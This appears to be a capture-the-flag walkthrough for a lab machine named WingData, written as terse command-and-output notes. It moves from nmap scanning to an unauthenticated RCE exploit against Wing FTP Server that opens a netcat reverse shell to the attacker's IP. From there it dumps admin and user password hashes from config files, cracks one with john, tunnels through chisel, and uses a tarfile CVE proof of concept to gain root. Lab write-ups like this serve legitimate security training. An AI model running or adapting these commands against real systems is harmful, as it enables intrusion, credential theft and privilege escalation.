WingData
External Enumeration
Nmap
nmap -sC -sV -Pn -p- -T4 10.129.225.44
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
| 256 a1:fa:95:8b:d7:56:03:85:e4:45:c9:c7:1e:ba:28:3b (ECDSA)
|_ 256 9c:ba:21:1a:97:2f:3a:64:73:c1:4c:1d:ce:65:7a:2f (ED25519)
80/tcp open http Apache httpd 2.4.66
|_http-server-header: Apache/2.4.66 (Debian)
|_http-title: WingData Solutions
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo nmap -sC -sV --top-ports 100 -sU 10.129.225.44HTTP (80)
- Has client portal VHOST
ftp.wingdata.htb
- Able to get Unauthenticated RCE on server
- Displays Version
FTP server software powered byWing FTP Server v7.4.3
Exploiting Wing FTP Server
python3 52347.py -u http://ftp.wingdata.htb -c 'busybox nc 10.10.14.13 4444 -e /bin/sh'nc -nvlp 4444- Able to receive reverse shell
- Stabilize Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl + z
stty raw -echo; fg
stty rows 38 columns 116Shell as WingFTP
wingftp@wingdata:/opt/wftpserver/Data/1$ cat settings.xml
<SaltingString>WingFTP</SaltingString>- Collecting all user hashes from
/opt/wftpserver/Data/1
- Creating Hashes List
wingftp@wingdata:/opt/wftpserver/Data/_ADMINISTRATOR$ cat admins.xml
<?xml version="1.0" ?>
<ADMIN_ACCOUNTS Description="Wing FTP Server Admin Accounts">
<ADMIN>
<Admin_Name>admin</Admin_Name>
<Password>a8339f8e4465a9c47158394d8efe7cc45a5f361ab983844c8562bef2193bafba</Password>
<Type>0</Type>
<Readonly>0</Readonly>
<IsDomainAdmin>0</IsDomainAdmin>
<DomainList></DomainList>
<MyDirectory></MyDirectory>
<EnableTwoFactor>0</EnableTwoFactor>
<TwoFactorCode></TwoFactorCode>
</ADMIN>
</ADMIN_ACCOUNTS>echo 'john:c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10$WingFTP
maria:a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03$WingFTP
steve:5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca$WingFTP
wacky:32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca$WingFTP
admin:a8339f8e4465a9c47158394d8efe7cc45a5f361ab983844c8562bef2193bafb$WingFTP' > hashes.txt- Cracking Hashes
john --format=dynamic='sha256($p.$s)' hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
!#7Blushing^*Bride5 (wacky)Admin Wing FTP Server - No Results
wingftp@wingdata:/opt/wftpserver/Data/_ADMINISTRATOR$ cat settings.xml
<?xml version="1.0" ?>
<Administrator Description="Wing FTP Server Administrator Options">
<HttpPort>5466</HttpPort>
<HttpSecure>0</HttpSecure>
<AdminLogfileEnable>1</AdminLogfileEnable>
<AdminLogfileFileName>Admin-%Y-%M-%D.log</AdminLogfileFileName>
<AdminLogfileMaxsize>0</AdminLogfileMaxsize>
<EnablePortUPnP>0</EnablePortUPnP>
</Administrator>chisel server -p 9001 --reverse
./chisel.1 client 10.10.14.13:9001 R:5466:127.0.0.1:5466Shell as Wacky
ssh wacky@wingdata.htb
!#7Blushing^*Bride5- Checking Privileges
wacky@wingdata:~$ sudo -l
Matching Defaults entries for wacky on wingdata:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User wacky may run the following commands on wingdata:
(root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *- Has vulnerable code
STAGING_BASE = "/opt/backup_clients/restored_backups"
staging_dir = os.path.join(STAGING_BASE, args.restore_dir)
tar.extractall(path=staging_dir, filter="data")- Vulnerable to
CVE-2025-4517
https://github.com/StealthByte0/CVE-2025-4517-poc/blob/main/CVE-2025-4517.py
- Update Username, file path, transfer to machine
python3 CVE-2025-4517.py
python3 -m http.server
wget http://10.10.14.13:8000/backup_1001.tarsudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py -b backup_1001.tar -r restore_01- Check Updated Permissions
wacky@wingdata:/opt/backup_clients/backups$ sudo -l
User wacky may run the following commands on wingdata:
(ALL) NOPASSWD: ALLShell as Root
sudo su
root@wingdata:~# cat root.txt
719c0e57ce0465a57dbfcedf8681aaff